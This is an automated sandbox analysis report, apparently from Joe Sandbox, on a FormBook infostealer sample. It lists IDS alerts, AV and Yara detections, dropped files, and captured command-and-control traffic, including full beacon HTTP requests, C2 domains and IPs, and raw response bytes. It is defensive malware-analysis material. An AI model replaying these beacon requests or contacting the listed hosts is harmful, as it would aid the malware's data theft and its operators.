Timestamp:	2024-07-27T08:07:07.210427+0200
SID:	2855464
Source Port:	62403
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.6

Timestamp:	2024-07-27T08:05:11.068176+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 51.89.93.192

Timestamp:	2024-07-27T08:06:56.482623+0200
SID:	2855465
Source Port:	62400
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 172.191.244.62

Timestamp:	2024-07-27T08:08:42.335266+0200
SID:	2855464
Source Port:	62431
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 162.241.216.26

Timestamp:	2024-07-27T08:08:59.240517+0200
SID:	2855465
Source Port:	62436
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 95.169.27.235

Timestamp:	2024-07-27T08:05:45.825566+0200
SID:	2855465
Source Port:	62384
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:07:15.349236+0200
SID:	2855464
Source Port:	62405
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.241.41.54

Timestamp:	2024-07-27T08:07:33.636052+0200
SID:	2855464
Source Port:	62411
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 157.7.107.37

Timestamp:	2024-07-27T08:06:21.036129+0200
SID:	2855464
Source Port:	62389
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.95.113.62

Timestamp:	2024-07-27T08:07:47.510339+0200
SID:	2855464
Source Port:	62415
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:06:11.703721+0200
SID:	2855464
Source Port:	62387
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 157.7.107.37

Timestamp:	2024-07-27T08:06:26.212321+0200
SID:	2855464
Source Port:	62391
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 202.52.146.180

Timestamp:	2024-07-27T08:08:02.214540+0200
SID:	2855464
Source Port:	62419
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.6

Timestamp:	2024-07-27T08:05:34.708798+0200
SID:	2022930
Source Port:	443
Destination Port:	62383
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: 8SxJ9aYfJ1.exe	ReversingLabs: Detection: 95%
Source: 8SxJ9aYfJ1.exe	Virustotal: Detection: 43%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8SxJ9aYfJ1.exe

Joe Sandbox ML: detected

Source: 8SxJ9aYfJ1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8SxJ9aYfJ1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: findstr.pdbGCTL source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000F.00000002.2567891581.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4527947703.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4528354654.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sbJGUdSMCgtLQJ.exe, 00000011.00000002.4523958138.000000000016E000.00000002.00000001.01000000.0000000D.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4524029986.000000000016E000.00000002.00000001.01000000.0000000D.sdmp, sbJGUdSMCgtLQJ.exe, 00000017.00000002.4523960013.000000000016E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.00000000036AE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2392246539.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2398513253.0000000003362000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.0000000003510000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2574871339.000000000376D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2568189800.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003920000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: findstr.pdb source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, TwkYThKVQVaYn.exe, 0000000F.00000002.2567891581.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4527947703.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000002.4528354654.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 8SxJ9aYfJ1.exe, 8SxJ9aYfJ1.exe, 0000000A.00000002.2392690731.0000000001600000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.00000000036AE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2392246539.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2398513253.0000000003362000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.4530621249.0000000003510000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2574871339.000000000376D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000015.00000003.2568189800.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000015.00000002.2641687151.0000000003920000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 4x nop then jmp 06A7AFE1h	0_2_06A7B108
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 4x nop then jmp 06A7AFE1h	0_2_06A7B88E
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 4x nop then jmp 06E1A279h	11_2_06E1A3A0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 4x nop then jmp 06E1A279h	11_2_06E1AB26

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.ngkwnq.xyz
Source:	DNS query: www.xyz-store.xyz

Source: Joe Sandbox View	IP Address: 203.161.50.128 203.161.50.128
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9VcwCWuR5N2hVTeUiUKYj3c1cP+6QCcj3wzwE0gmMNT1PJlFHdnkMlbksrXDYRbbL33cvAUMoN8r+Pi3M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.miquwawa.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /x06k/?9Fjx=T/qtMR3LKa4LTbjyNUJlNW8HBO2mLr7NkQwOkzuXYGM8AEnHwE1BuDDgjz7zxChee1OBLSwV/HnzTXSDWu5qS8SxudlejhZ2wNFZ4/rc81wcJeYkmogq71U2jvAp6KKDndns21g=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.exporationgenius.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /iczo/?h20PB=Ilr0H&9Fjx=JY7jtaSJ5x5vzidknG2ksTpeyXyaG7X3ywH460gVL7Ewt7sZ57bb2J66wgBGIrGl5fwva+984CsI5kCUEaeHAKxito/MplmCBaK67oIqKDsPwPbc7aid6ru9XlM638WWQIDRvms= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.zocalo-fuk.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /sg27/?9Fjx=cpYt0YSQq6qumPKnLg+mC8LQzbjhCfVjUwEln5zritMpGV/+kM1tERFpp4gfmVNp46bstuO0H+g7H2/quwpl6ls6SEGImodBdGoSGHjCZU2G7An66QSlhEKUMH7zQGocUjr8wdY=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tcfreal.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /f97t/?9Fjx=hkoMjg324npAs1ZCaJ4l6gjuuMVKqirGeTvgOqr4Vk4zrcx6pPdR0EEsFRv2ynLc3LXxE/GYJ+1j0EaBoRiBDqID1A1i8E5oXVGiNZgqPpHIcw0wTETksExpRwNzA/AaAKrSJng=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noghteyab.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /8y3s/?9Fjx=m+e1HwtEOOeM4G5OXbOM1l1mMhEELbDuBR7SzEsfX5sQt5Y/60pxewufhKo1oWdPn8Rq+iGyekpfb4U1GvT2jbL6nhhjvrxd94xSxVO4NFUPY0kg0texG8HyL5tYcYoZK9KCXOc=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loangoatworld.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /eswm/?9Fjx=kmg9BJrUCzlvU3B1U8cIsefRuOfVIhtZrQUgpiqKrOwCnwcSpMqzXu0YTkKwwz3EGAI1xXkfDLD4/+xpEkQKl9cp8dUrHPy6DKlu7hiR/LVjeBsCr0gmgApJoLXICQLrB8wEfno=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.forthelement.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /d35k/?9Fjx=mYqJmY5N0EkuGYw55ICE83MYfmiquaD5Mn1sUdQzEPuHiGIXpacTVdBwiKhhqJWGIPtvCRJCv4+YbwE4X6wPqeg8BmvgAMn8RLdfcR/MG4n//pV4lC7duaqjl6kReXVA9zSQFQA=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ngkwnq.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /gx7l/?9Fjx=a7hzNdnkeS27kktwRLGSx8yR2sA6hGpGYEa4s+kW8/8nhO4qbMwiGFPThwQr7Jt1vJRCiF4mQ47wrk5EK+BQCUwjbLnD+Licdnqi1ONE6USu+A5nC085uF77bSHLzlvxtDSsS9g=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hermandadcoyotes.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /8vum/?9Fjx=mMAT0VmYBXrn84GDY3jN9eT5aVT33QlPc8t3UynAD89QghEERF9j2st9BPanxmMeaSIDnLSTLKjuqvUky6NP4LhFqV3UnyKctbAktMQsAL9RdihXFK7EH5ocxuixaBnvMu0t3gQ=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.desakedungpeluk.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg3jH9QMg622Z6S/PpXr7Dw5Hrqt15Rk+HZEJRRYk4+G8611O/TYHNVjD8KHzBwMH6yNIySy4kYDr0sQvZqeQkDTLiMYeJ4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.michaelstutorgroup.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /5egn/?9Fjx=LS7e07ng+gHNsyJARIPtuVi+lEkqNBJQ2ublElNdV5gzbr2xH6h/El6SaWwjRr8Uba16H88ExuT+84ut878T3wBrsvgB0imO00p96tUlW1EzL/ongopUwV5X18HPxTdgNiqUy4Q=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dkimhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /ixgj/?9Fjx=/Zj6VqX56ByDodokLRjPKDm3Pwn2S1h1h7pQZ2SgqDdN9OrisfEzogZ++nqPS1/BV9/5rcururFkQ+JMtWq084ODcNTM6ri6BugJHEDlWjTEcfv6bdNq3ciQP3N1zgfhFVTfb+g=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.xyz-store.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /pf6m/?9Fjx=bj2jTCh2dAa0W37Ors9MIV8y6VuL4TB52i9XdK5qnE1eDYGuKlwknV9AdIGtnY1bTK6+aXD2gMPFTRYJsf/RVFQwT4yLxuuIQKRkes7NkFHq0brUctiaXa3KGHH0n3cgm+LnNOk=&h20PB=Ilr0H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artistcalculator.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.miquwawa.com
Source: global traffic	DNS traffic detected: DNS query: www.exporationgenius.sbs
Source: global traffic	DNS traffic detected: DNS query: www.zocalo-fuk.com
Source: global traffic	DNS traffic detected: DNS query: www.tcfreal.top
Source: global traffic	DNS traffic detected: DNS query: www.noghteyab.com
Source: global traffic	DNS traffic detected: DNS query: www.loangoatworld.com
Source: global traffic	DNS traffic detected: DNS query: www.forthelement.com
Source: global traffic	DNS traffic detected: DNS query: www.ngkwnq.xyz
Source: global traffic	DNS traffic detected: DNS query: www.hermandadcoyotes.com
Source: global traffic	DNS traffic detected: DNS query: www.desakedungpeluk.com
Source: global traffic	DNS traffic detected: DNS query: www.michaelstutorgroup.com
Source: global traffic	DNS traffic detected: DNS query: www.dkimhub.com
Source: global traffic	DNS traffic detected: DNS query: www.xyz-store.xyz
Source: global traffic	DNS traffic detected: DNS query: www.artistcalculator.com

Source: unknown

HTTP traffic detected: POST /x06k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 209Cache-Control: no-cacheConnection: closeHost: www.exporationgenius.sbsOrigin: http://www.exporationgenius.sbsReferer: http://www.exporationgenius.sbs/x06k/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 39 46 6a 78 3d 65 39 43 4e 50 6d 4c 78 45 4c 4d 45 54 5a 48 30 47 54 74 57 5a 32 39 6f 64 38 72 64 4f 62 48 4f 76 68 51 33 76 30 66 72 4f 53 34 42 47 68 62 49 2f 43 31 52 67 6c 62 43 74 68 54 6e 38 52 49 57 5a 32 4b 74 4b 58 78 44 34 31 4b 78 4b 54 75 53 42 4d 6c 72 58 59 32 75 6e 50 5a 62 70 6d 41 32 35 50 35 47 38 6f 4c 4d 77 33 6b 63 4d 72 30 69 2f 72 6b 6e 34 58 6c 6d 36 75 4d 73 31 39 4b 61 30 6f 2f 35 79 68 33 38 58 6f 6a 73 42 63 57 61 70 51 79 64 66 77 31 70 61 38 4b 50 38 68 32 35 34 62 73 43 59 74 32 44 68 4f 55 61 62 2f 6b 74 4c 64 72 34 61 44 50 37 45 7a 53 6e 48 69 4e 53 4b 6c 53 57 51 76 45 77 70 2b 71 72 Data Ascii: 9Fjx=e9CNPmLxELMETZH0GTtWZ29od8rdObHOvhQ3v0frOS4BGhbI/C1RglbCthTn8RIWZ2KtKXxD41KxKTuSBMlrXY2unPZbpmA25P5G8oLMw3kcMr0i/rkn4Xlm6uMs19Ka0o/5yh38XojsBcWapQydfw1pa8KP8h254bsCYt2DhOUab/ktLdr4aDP7EzSnHiNSKlSWQvEwp+qr

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTnc5Xlhr8DoGpFhPEbE8Cq7bhrEbc5hZdJtsaiKJk1Tx7fP2%2FNmdF9wpewMjEE%2BmXFz1byR6xvdGfmu4WYMxQQ017Yt4oZfQvWz43dmXeAFnVV7%2F8IGHTYZnFMtMI%2Fr74auUWNSLsahf68%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a9a7109aba5727a-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: baL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?ey0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99PBLuOdq8VqU9PYz3BINCw3QQreUE9v26mkcl8Or%2B4%2F93nB%2FNWQKBskKnuhb16UTR2CpviJ2%2BfxxP16%2Fw%2Fwj58hG%2BajWLVePp1N%2BdkvB%2BO1gX4kyCAH21wQUFQwv8M970wM0IJKKeIDl70%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a9a7119beedc337-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a f0 09 fb 49 3f 8b 09 e7 43 3f 00 00 00 ff ff e3 02 00 82 ac 65 79 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: baL0D+{`.I)i9s2J8W)y1OEdi6~gErFqQAidf$2i?FQV0SSwBg&LN7^jI?C?ey0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4v7V%2BJzgNUiKtCRsBpPzoG0T6kPVeKCmm27zK41h9Pbp45v1DAFco4vzHFPKU3w%2B3Ebe83N6N6xr38OCqDQcMFB4TWJJ1GPmQ8pmKr6NFYHwXvYPmqtuFqO%2FNPB0SyW6wFz6GUqtTzX2oo0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a9a7129b91ec47a-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e cb 0e 82 30 14 44 f7 fd 8a 2b 7b b9 60 88 ab 9b 2e e4 11 49 10 89 29 0b 97 9a d6 94 88 14 69 f1 f1 f7 06 d8 b8 9d 39 73 32 b4 4a 8e b1 38 57 29 ec c5 a1 80 aa de 15 79 0c de 1a 31 4f 45 86 98 88 64 69 36 7e 80 98 96 1e 67 a4 dd a3 e5 a4 d5 45 72 46 ae 71 ad e2 51 10 41 69 1c 64 66 ec 24 e1 12 32 c2 19 a2 ab 91 df 69 17 f2 3f 46 87 9c 51 cf 85 56 30 a8 e7 a8 ac 53 12 ea 53 01 f8 09 b6 77 84 f7 c5 42 67 1c dc 26 1c 4c 07 4e 37 16 ac 1a 5e 6a 